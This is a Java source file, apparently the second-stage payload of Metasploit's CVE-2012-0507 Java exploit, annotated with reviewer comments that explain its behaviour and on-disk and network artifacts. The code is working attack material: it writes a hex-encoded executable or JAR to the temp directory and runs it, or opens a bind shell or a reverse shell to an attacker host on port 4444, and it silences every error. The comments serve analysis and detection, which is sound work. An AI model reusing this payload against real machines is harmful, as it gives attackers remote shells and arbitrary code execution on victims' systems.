package msf.x;
import java.io.BufferedReader;
import java.io.BufferedWriter;
import java.io.File;
import java.io.FileOutputStream;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.io.OutputStream;
import java.io.OutputStreamWriter;
import java.net.ServerSocket;
import java.net.Socket;
import java.security.AccessController;
import java.security.PrivilegedExceptionAction;
public class PayloadX implements PrivilegedExceptionAction
{
    // Second-stage payload belonging to the exploit module this file ships with
    // (external/source/exploits/CVE-2012-0507 in metasploit-framework, per the
    // page path). What it does is selected entirely by the static fields below,
    // which the exploit stage is expected to set before (or between)
    // instantiations:
    //   data set  -> write a native executable to java.io.tmpdir and run it
    //   jar set   -> write a JAR to java.io.tmpdir and run it with "java -jar"
    //   neither   -> plain TCP bind shell (lhost == null) or reverse shell
    // Observable artifacts, all visible in run() below: a file in the temp dir
    // whose name is the decimal rendering of Math.random() plus ".exe" or
    // ".jar" (e.g. "0.123456789.jar"), a child process spawned from the JVM via
    // Runtime.exec(), and either a listening socket on lport (default 4444) or
    // an outbound connection to lhost:lport. Every exception in this class is
    // swallowed, so a failed run leaves no error output.

    // This will contain a hex string of the native payload to drop and execute.
    public static String data = null;
    // Hex string of a JAR to drop and execute (see the "Dropping JAR" branch in run()).
    public static String jar = null;
    // If no native payload is set we get either a java bind shell or a java
    // reverse shell.
    // lhost == null selects the bind shell (listen on lport); otherwise the
    // payload connects back to lhost:lport. Both values are also passed as
    // command-line arguments to the dropped JAR.
    public static String lhost = null;
    public static int lport = 4444;

    // Pumps everything readable from `is` into `os` on its own thread; run()
    // starts two of these to cross-wire the shell's stdout/stdin with the
    // socket. The copy goes through InputStreamReader/OutputStreamWriter
    // constructed without a charset, so bytes are decoded and re-encoded with
    // the platform default charset: this is a text pipe, not a byte-exact one.
    // Non-static inner class, so each instance also references the enclosing
    // PayloadX.
    class StreamConnector extends Thread
    {
        InputStream is;
        OutputStream os;

        StreamConnector( InputStream is, OutputStream os )
        {
            this.is = is;
            this.os = os;
        }

        // Copy loop: blocks in read() until the source reaches end of stream or
        // throws, then closes both ends. Every exception (including whatever
        // ended the loop) is silently discarded and the thread simply exits.
        public void run()
        {
            BufferedReader in = null;
            BufferedWriter out = null;

            try
            {
                in = new BufferedReader( new InputStreamReader( is ) );
                out = new BufferedWriter( new OutputStreamWriter( os ) );
                char buffer[] = new char[8192];
                int length;
                // read() returns -1 at end of stream, which terminates the loop.
                while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )
                {
                    out.write( buffer, 0, length );
                    // Flush after every chunk so interactive output is not held
                    // back in the BufferedWriter.
                    out.flush();
                }
            }
            catch( Exception e ) {}

            // Best-effort close of both ends; a failure here is ignored too.
            try
            {
                if( in != null )
                    in.close();
                if( out != null )
                    out.close();
            }
            catch( Exception e ) {}
        }
    }

    // http://stackoverflow.com/questions/140131/convert-a-string-representation-of-a-hex-dump-to-a-byte-array-using-java
    // Decodes a hex string (two digits per byte, no separators) into bytes.
    // There is no validation: an odd-length input throws
    // StringIndexOutOfBoundsException at charAt( i + 1 ), and a non-hex
    // character makes Character.digit() return -1, which is folded into the
    // byte value rather than rejected.
    public static byte[] StringToBytes( String s )
    {
        byte[] data = new byte[s.length() / 2];

        for( int i = 0 ; i < s.length() ; i += 2 )
            data[i / 2] = (byte)( ( Character.digit( s.charAt( i ), 16 ) << 4 ) + Character.digit( s.charAt( i + 1 ), 16 ) );

        return data;
    }

    // PrivilegedExceptionAction body, invoked from the constructor through
    // AccessController.doPrivileged(). Picks one of the three actions described
    // on the class based on the static fields. Always returns null; any
    // exception raised inside is swallowed by the catch at the bottom.
    public Object run() throws Exception
    {
        //System.out.println("Running");
        // if the native payload data has not been set just return for now, it
        // will be set by the next time we reach here.
        if( PayloadX.data == null && PayloadX.jar == null )
            return null;
        //System.out.println("have either data or jar");

        try
        {
            // Only used to choose cmd.exe vs /bin/sh and to decide whether the
            // dropped file needs a chmod.
            String os = System.getProperty( "os.name" );

            //System.out.println("OS: " + os);
            // if we have no native payload to drop and execute we default to
            // either a TCP bind or reverse shell.
            if(
                (PayloadX.data == null || PayloadX.data.length() == 0) &&
                (PayloadX.jar == null || PayloadX.jar.length() == 0)
            ) {
                //System.out.println("no, exe/jar. Doing shell");
                Socket client_socket = null;

                String shell = "/bin/sh";

                if( os.indexOf( "Windows" ) >= 0 )
                    shell = "cmd.exe";

                if( PayloadX.lhost == null )
                {
                    // Bind shell: listen on lport and accept a single connection.
                    // The ServerSocket is never closed, so the listening port
                    // remains open in this JVM afterwards.
                    ServerSocket server_socket = new ServerSocket( PayloadX.lport );
                    client_socket = server_socket.accept();
                }
                else
                {
                    // Reverse shell: connect out to lhost:lport.
                    client_socket = new Socket( PayloadX.lhost, PayloadX.lport );
                }

                if( client_socket != null )
                {
                    // NOTE(review): exec() below calls waitFor() before returning,
                    // so this line does not return until the shell process has
                    // exited, and the connectors are only started after that —
                    // confirm whether this branch is ever exercised in practice.
                    Process process = exec( shell );
                    if( process != null )
                    {
                        // shell stdout -> socket, and socket -> shell stdin.
                        ( new StreamConnector( process.getInputStream(), client_socket.getOutputStream() ) ).start();
                        ( new StreamConnector( client_socket.getInputStream(), process.getOutputStream() ) ).start();
                    }
                }
            }
            else if( PayloadX.jar != null && (PayloadX.jar.length() != 0) )
            {
                //System.out.println("Dropping JAR");
                // On-disk artifact: "<java.io.tmpdir>/<Math.random()>.jar". Unlike
                // the EXE branch below, this file is not deleted afterwards.
                String path = System.getProperty( "java.io.tmpdir" ) + File.separator + Math.random() + ".jar";

                writeFile( path, StringToBytes( PayloadX.jar ) );
                // Spawns a second JVM with lhost/lport as arguments; a null lhost
                // is concatenated as the literal string "null". Runtime.exec(String)
                // splits the command on whitespace, so a temp dir containing a
                // space would break this command line.
                exec( "java -jar " + path + " " + PayloadX.lhost + " " + PayloadX.lport + " true");
            }
            else
            {
                //System.out.println("Dropping EXE");
                // On-disk artifact: "<java.io.tmpdir>/<Math.random()>.exe"; the
                // ".exe" suffix is used on non-Windows hosts as well.
                String path = System.getProperty( "java.io.tmpdir" ) + File.separator + Math.random() + ".exe";

                writeFile( path, StringToBytes( PayloadX.data ) );
                if( os.indexOf( "Windows" ) < 0 )
                {
                    // Non-Windows: mark the file executable via an external chmod process.
                    exec( "chmod 755 " + path );
                }
                // exec() waits for the child, so the delete normally runs only
                // after it has exited; the file exists for the child's lifetime.
                exec( path );
                new File( path ).delete();
            }
        }
        catch( Exception e ) {
            //System.out.println(e);
        }

        return null;
    }

    // Runs `path` through Runtime.exec(String) and waits for the child to exit.
    // Returns the Process, or null if Runtime.exec() itself threw. Every
    // exception, including InterruptedException from waitFor(), is swallowed
    // here, and the thread's interrupt flag is not restored.
    public Process exec( String path )
    {
        Process p = null;
        //System.out.println( "Executing" );
        try {
            p = Runtime.getRuntime().exec( path );
            // Dead check: the body is empty, and a null p would only surface as
            // an NPE from waitFor() that the catch below absorbs anyway.
            if( p == null )
            {
                //System.out.println( "Null process, crap" );
            }
            // Blocks the caller until the child terminates.
            p.waitFor();
        } catch( Exception e ) {
            //System.out.println(e);
        }
        return p;
    }

    // Writes `data` to `path`, creating or truncating the file. Errors are
    // swallowed, so the caller cannot tell whether anything was written. There
    // is no finally block, so if write() throws the stream is never closed.
    public void writeFile( String path, byte[] data )
    {
        //System.out.println( "Writing file" );
        try {
            FileOutputStream fos = new FileOutputStream( path );

            fos.write( data );
            fos.close();
        } catch( Exception e ) {
            //System.out.println(e);
        }
    }

    // Instantiation is the trigger: the constructor immediately executes run()
    // under AccessController.doPrivileged(), i.e. with the permissions of this
    // class's own protection domain rather than those of the calling stack.
    // Presumably the exploit has already arranged a privileged domain for this
    // class — that part is outside this file; confirm against the loader.
    // A PrivilegedActionException wrapping anything run() throws is swallowed.
    public PayloadX()
    {
        try
        {
            AccessController.doPrivileged( this );
        }
        catch( Exception e ) {
            //System.out.println(e);
        }
    }
}